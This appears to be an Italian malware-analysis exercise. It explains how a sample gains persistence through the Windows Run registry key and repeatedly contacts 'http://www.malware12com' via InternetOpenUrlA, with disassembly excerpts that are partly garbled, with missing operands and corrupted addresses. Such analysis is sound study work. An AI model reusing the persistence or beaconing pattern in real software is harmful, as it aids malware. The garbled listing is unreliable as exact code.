analisi estratti di un malware

Questo malware utilizza il registro di windows per ottenere la persistenza chiamando due funzioni:

chiamata della funzione RegOpenKeyExW:

apre una chiave di registro per modificarla

chiamata della funzione RegSetValueExW:

aggiunge un nuovo valore all'interno del registro

Quindi il malware apre una chiave di registro per aggiungere un valore in modo tale da ottenere persistenza

```
0040286F
                                      samDesired
           push
00402871
                                     ulOptions
           push
                                      "Software\\Microsoft\\Windows\\CurrentVersion\\Run'
00402872
                   HKEY LOCAL MACHINE; hKey
00402877
           push
                   esi ; RegOpenKeyExW
)040287C
0040287E
           test
                   eax, eax
                   short loc 4028C5
00402880
           jnz
00402882
)0402882 loc_402882:
00402882
           lea
                   ecx, [esp+424h+Data]
00402886
           push
                                    ; lpString
                   bl. 1
00402887
           mov
           call
                   ds:lstrlenW
00402889
0040288F
                   edx, [eax+eax+2]
           lea
                                    ; cbData
00402893
           push
00402894
                   edx, [esp+428h+hKey]
           mov
00402898
                   eax, [esp+428h+Data]
           lea
0040289C
           push
                                     lpData
0040289D
           push
                                      dwType
0040289F
                                     Reserved
           push
                   ecx, [esp+434h+ValueName]
004028A1
           lea
004028A8
                                    ; lpValueName
           push
004028A9
                                    ; hKey
           push
                   ds:RegSetValueExW
 04028AA
```

chiamata della funzione InternetOpenA:

funzione utilizzata per avviare una connessione verso Internet

URL a cui il malware cerca di connettersi

chiamata della funzione InternetOpenUrlA:

funzione utilizzata per connettersi all'url specifico visto sopra

```
SUBROUTIN
.text:00401150
.text:00401150
.text:00401150
.text:00401150 ; DWORD stdcall StartAddress(LPVOID)
                                                          ; DATA XREF: sub_401040+ECTo
.text:00401150 StartAddress
                                proc near
.text:00481150
                                push
                                         esi
.text:00401151
                                push
                                         edi
.text:00401152
                                                          ; dwFlags
                                push
.text:00401154
                                                          ; lpszProxyBypass
                                push
                                push
                                                           1pszProxy
.text:00401156
                                                          : dwAccessTupe
.text:00401158
                                push
                                                           "Internet Explorer 8.0"
                                        offset szAgent
.text:0040115A
                                push
                                        ds:InternetOpenA
.text:0040115F
                                call
                                         edi, ds:InternetOpenUrlA
.text:00401165
                                MOV
.text:0040116B
                                        esi, eax
                                MOV
.text:0040116D
.text:0040116D loc 40116D:
                                                          ; CODE XREF: StartAddress+30↓j
.text:0040116D
                                                           dwContext
                                push
                                        80000000h
                                                           dwFlags
.text:0040116F
                                push
                                                           dwHeadersLength
.text:00401174
                                pusn
                                                           1pszHeaders
.text:00401176
                                push
                                        offset szUr.
                                                            "http://www.malware12com
.text:00401178
                                push
.text:<del>0040</del>117D
                                                           hInternet
                                        esi
                                push
                                        edi ; InternetOpenUrlA
                                call
.text:0040117E
                                         short loc_40116D
.text:00401180
                                jmp
.text:00401180 StartAddress
                                endp
.text:00401180
```